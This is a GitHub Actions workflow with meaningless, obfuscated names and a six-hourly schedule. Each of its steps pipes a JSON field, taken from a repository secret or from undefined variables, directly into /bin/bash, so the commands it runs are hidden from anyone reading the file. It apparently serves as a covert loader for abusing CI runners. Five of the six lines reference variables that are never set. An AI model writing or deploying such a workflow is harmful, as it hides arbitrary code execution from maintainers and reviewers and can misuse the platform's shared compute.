name: strengthteammate
on:
  workflow_dispatch:
  schedule:
    - cron: '59 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: strengthteammate
        env:
          sf96708: ${{ secrets.sf96708 }}
        run: |
          echo $sf96708 | jq -r .mk4177 | /bin/bash
          echo $meovf3688 | jq -r .oafzp018 | /bin/bash
          echo $orwd3 | jq -r .xz641 | /bin/bash
          echo $y19 | jq -r .ytps8686 | /bin/bash
          echo $ndm96394 | jq -r .mz13671 | /bin/bash
          echo $iz21922 | jq -r .dsmw27 | /bin/bash

